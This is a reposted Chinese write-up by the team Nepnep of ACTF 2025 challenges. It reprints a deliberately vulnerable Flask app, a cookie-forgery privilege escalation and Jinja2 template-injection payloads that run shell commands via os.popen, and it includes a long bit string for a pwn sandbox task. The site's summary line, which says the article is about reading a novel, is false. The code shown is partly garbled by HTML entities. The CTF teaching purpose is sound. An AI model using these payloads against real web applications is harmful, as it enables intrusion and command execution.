ACTF2025WriteupbyNepnep

admin
admin
admin
0
文章
0
评论
2026-05-02 05:33:37 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文介绍了ACTF2025的Writeup,由Nepnep原创。文章主要讨论了在小说阅读器读本章的经历。 综合评分: 0 文章分类: 其他

Embedded Image

利用别的账号拿到加密对,打AES字节翻转攻击伪造admin拿到cookie,然后打SSTI即可

url/home?payload={{“”.class.base.subclasses()[137].init.globals.popen(“cat%20flag.txt”).read()}}

Not so web2

源代码:

import base64, json, time
import os, sys, binascii
from dataclasses import dataclass, asdict
from typing import Dict, Tuple
from secret import KEY, ADMIN_PASSWORD
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5
from Crypto.Hash import SHA256
from flask import (
    Flask,
    render_template,
    render_template_string,
    request,
    redirect,
    url_for,
    flash,
    session,
    abort,
)

app = Flask(__name__)
app.secret_key = KEY

if os.path.exists("/etc/ssl/nginx/local.key"):
    private_key = RSA.importKey(open("/etc/ssl/nginx/local.key", "r").read())
else:
    private_key = RSA.generate(2048)

public_key = private_key.publickey()

@dataclass
class APPUser:
    name: str
    password_raw: str
    register_time: int

#  In-memory store for user registration
users: Dict[str, APPUser] = {
    "admin": APPUser(name="admin", password_raw=ADMIN_PASSWORD, register_time=-1)
}

def validate_cookie(cookie_b64: str) -> bool:
    valid, _ = parse_cookie(cookie_b64)
    return valid

def parse_cookie(cookie_b64: str) -> Tuple[bool, str]:
    ifnot cookie_b64:
        returnFalse, ""

    try:
        cookie = base64.b64decode(cookie_b64, validate=True).decode()
    except binascii.Error:
        returnFalse, ""

    try:
        msg_str, sig_hex = cookie.split("&")
    except Exception:
        returnFalse, ""

    msg_dict = json.loads(msg_str)
    msg_str_bytes = msg_str.encode()
    msg_hash = SHA256.new(msg_str_bytes)
    sig = bytes.fromhex(sig_hex)
    try:
        PKCS1_v1_5.new(public_key).verify(msg_hash, sig)
        valid = True
    except (ValueError, TypeError):
        valid = False
    return valid, msg_dict.get("user_name")

def generate_cookie(user: APPUser) -> str:
    msg_dict = {"user_name": user.name, "login_time": int(time.time())}
    msg_str = json.dumps(msg_dict)
    msg_str_bytes = msg_str.encode()
    msg_hash = SHA256.new(msg_str_bytes)
    sig = PKCS1_v1_5.new(private_key).sign(msg_hash)
    sig_hex = sig.hex()
    packed = msg_str + "&" + sig_hex
    return base64.b64encode(packed.encode()).decode()

@app.route("/")
def index():
    if validate_cookie(request.cookies.get("jwbcookie")):
        return redirect(url_for("home"))
    return redirect(url_for("login"))

@app.route("/register", methods=["GET", "POST"])
def register():
    if request.method == "POST":
        user_name = request.form["username"]
        password = request.form["password"]
        if user_name in users:
            flash("Username already exists!", "danger")
        else:
            users[user_name] = APPUser(
                name=user_name, password_raw=password, register_time=int(time.time())
            )
            flash("Registration successful! Please login.", "success")
            return redirect(url_for("login"))
    return render_template("register.html")

@app.route("/login", methods=["GET", "POST"])
def login():
    if request.method == "POST":
        username = request.form["username"]
        password = request.form["password"]
        if username in users and users[username].password_raw == password:
            resp = redirect(url_for("home"))
            resp.set_cookie("jwbcookie", generate_cookie(users[username]))
            return resp
        else:
            flash("Invalid credentials. Please try again.", "danger")
    return render_template("login.html")

@app.route("/home")
def home():
    valid, current_username = parse_cookie(request.cookies.get("jwbcookie"))
    ifnot valid ornot current_username:
        return redirect(url_for("logout"))

    user_profile = users.get(current_username)
    ifnot user_profile:
        return redirect(url_for("logout"))

    if current_username == "admin":
        payload = request.args.get("payload")
        if payload:
            for char in payload:
                if char in"'_#&;":
                    abort(403)
                    return

        html_template = """
<!DOCTYPE html>
<html lang="en">
<head>
&nbsp; &nbsp; <meta charset="UTF-8">
&nbsp; &nbsp; <meta name="viewport" content="width=device-width, initial-scale=1.0">
&nbsp; &nbsp; <title>Home</title>
&nbsp; &nbsp; <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
&nbsp; &nbsp; <link rel="stylesheet" href="{{ url_for('static', filename='styles.css') }}">
</head>
<body>
&nbsp; &nbsp; <div class="container">
&nbsp; &nbsp; &nbsp; &nbsp; <h2 class="text-center">Welcome, %s !</h2>
&nbsp; &nbsp; &nbsp; &nbsp; <div class="text-center">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Your payload: %s
&nbsp; &nbsp; &nbsp; &nbsp; </div>
&nbsp; &nbsp; &nbsp; &nbsp; <img src="{{ url_for('static', filename='interesting.jpeg') }}" alt="Embedded Image">
&nbsp; &nbsp; &nbsp; &nbsp; <div class="text-center">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <a href="/logout" class="btn btn-danger">Logout</a>
&nbsp; &nbsp; &nbsp; &nbsp; </div>
&nbsp; &nbsp; </div>
</body>
</html>
"""&nbsp;% (
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; current_username,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; payload,
&nbsp; &nbsp; &nbsp; &nbsp; )
&nbsp; &nbsp;&nbsp;else:
&nbsp; &nbsp; &nbsp; &nbsp; html_template = (
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"""
<!DOCTYPE html>
<html lang="en">
<head>
&nbsp; &nbsp; <meta charset="UTF-8">
&nbsp; &nbsp; <meta name="viewport" content="width=device-width, initial-scale=1.0">
&nbsp; &nbsp; <title>Home</title>
&nbsp; &nbsp; <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
&nbsp; &nbsp; <link rel="stylesheet" href="{{ url_for('static', filename='styles.css') }}">
</head>
<body>
&nbsp; &nbsp; <div class="container">
&nbsp; &nbsp; &nbsp; &nbsp; <h2 class="text-center">server code (encoded)</h2>
&nbsp; &nbsp; &nbsp; &nbsp; <div class="text-center" style="word-break:break-all;">
&nbsp; &nbsp; &nbsp; &nbsp; {%% raw %%}
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; %s
&nbsp; &nbsp; &nbsp; &nbsp; {%% endraw %%}
&nbsp; &nbsp; &nbsp; &nbsp; </div>
&nbsp; &nbsp; &nbsp; &nbsp; <div class="text-center">
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <a href="/logout" class="btn btn-danger">Logout</a>
&nbsp; &nbsp; &nbsp; &nbsp; </div>
&nbsp; &nbsp; </div>
</body>
</html>
"""
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; % base64.b64encode(open(__file__,&nbsp;"rb").read()).decode()
&nbsp; &nbsp; &nbsp; &nbsp; )
&nbsp; &nbsp;&nbsp;return&nbsp;render_template_string(html_template)

@app.route("/logout")
def&nbsp;logout():
&nbsp; &nbsp; resp = redirect(url_for("login"))
&nbsp; &nbsp; resp.delete_cookie("jwbcookie")
&nbsp; &nbsp;&nbsp;return&nbsp;resp

if&nbsp;__name__ ==&nbsp;"__main__":
&nbsp; &nbsp; app.run()

注册一个账号拿到 session 之后 base64 解码然后直接修改 user_name 字段内容为 admin 即可越权获得 admin 权限。然后 SSTI 只是简单绕过,payload:

{{(cycler.next["%c"%95+"%c"%95+"globals"+"%c"%95+"%c"%95].os.popen("cat flag.txt")).read()}}
#&nbsp;generated from fenjing.

Pwn

AFL sandbox

python交互的题目,首先有一个poW(工作量证明),通过工作量证明后会进入程序主体

构造出来的字符如下:

111111100100101111111100000000000000000000100000000000000000000100000000000000000000100000000000000000000100000000000000000000100000000000000000000000000000000000000000000000000000000000000001000000000000000000100000000000000000000001000000000000000000000001000000000000000000000000000000000000100000000000000000000100000000000000000000100000000000001000001100000000000000000001100000000000000000000100000000000000000000100001000000001000000100000001001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000001000001000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000100000000000000000000000000000000000000000001110100000001011101001000000100000000000001000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000001000000000000000000001000000000000000000001000000000000000000000000000000000000000001000000000000000000101000000000000000000000000000000000000000000000001000000000000000110100001001011101000100000000000000000000000000000000000000000100000000000000000000000000000000000000100000000000000000001000010000000000000000000100000000000000000000000000000001000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000100000000000000000000100000000000000000000100000000000000000000000000000000000000000100000000000000000001100000010000000000000000000000000000000100000000000000000000000000000010000000000000010100000101011101000000000000000000000000010000000000000000000000000010000000000000010000001000000000000000000000000000000000010000000000000000000000000000000010000000000100000000000000000000000000000000000000010000000000000000000000000000000000000000010000000000000000000010000000000000000000010000000000000000000000000000000000000000010000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001010100000000000000000000000000000000000000000000000000000000000000000000000000000100000001000000000000000000000000000000000000100000000001000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000101110000000000000000000000101010101000001100000000000000000000000000001000000000000100000000000000000000000000100000000000000010001000000000111110000000000000000000000010000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000010000000000000000000000000000000010000000000000000000000000100000000000000000000100000000000000000000100000000000000000000100000000000000000000100000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000000011000000000001000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111110100000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000100000000000000000000000000000100100000000000000000000000000000000000010000000100000000000000000000000000000000000000000000000000000000000010001010000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000010010000010000000000000000000000000000000001000000000000000000001000000000000000000001000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000001010100000000000000000000000000000000000000000000000000000000001000000000000000000000001000110001001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000110000000000001000000000000000000000000000000000000000000000000000000000000100000000000000001100000000000000000000000000000000000000000000000000000000000000000000001000000000010000000000000000000000000000001000000000000000100000000000110000000000000000000000000000000000000000100000000010000010000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000100110000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010001000100000001000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000010000000000000000000000000000000000000000100000000000000000001000000000000000000010000000000000000000000000110000100000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000010010000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000100000000000000000000000000000001000100000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000111000000000001000010000000000000000000001000000000000000000001000000000000000000100000000000000000000000000000000000000001000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000110110101000000000100100000000000000000000100000000000000000000100000000000000000000100000000000000000000000000000000001000000100000000000000000000000000000000000000000100000000000000000000001000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000001000000000000010000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000001000000000000000000000000000100000000001000111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000100000000000000000000000000000100000000000000000000000000000000000000000100000000000000000100000000000000000000000000000000100000000000000000000000000000000000100000000000000000000000000000100000000000000000000000000000000001000000000000000000000000000000000000100010000000100110001000000010000000000000000000000000100000000000000000000100000000000000000000100000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010100000001101110001100100000000000000000000000000000100000000000000000000100000000000000000000100000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000100000000000000000000000000000010000110000000000000000000000000100000000000000000000000000000000000000000000000000000000000000100110101001000000000000000000000000000000100000000000000000000100000000000000000000100000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010010000000000000000000000000000000000000000000001000000000000000000000000000000000000000000100100000000000000000000100000000000000000000100000101110000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000100000000000000000000100000000000000000000100000000000000000000000000000000000000000000000000000000000000111111101011000100000100000000000000000000100000000000000000000100000000000000000000100000000000000000000100000000000000000000100000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000010000000000000010000010000000000000000000000000000000000000000010000000000000000000000100000000000000000000000000000000000000000000000000000000000010000000000000000000000100000000000000000000000000000000000000000

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:Nepnep Nepnep Nepnep《ACTF 2025 Writeup by Nepnep》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0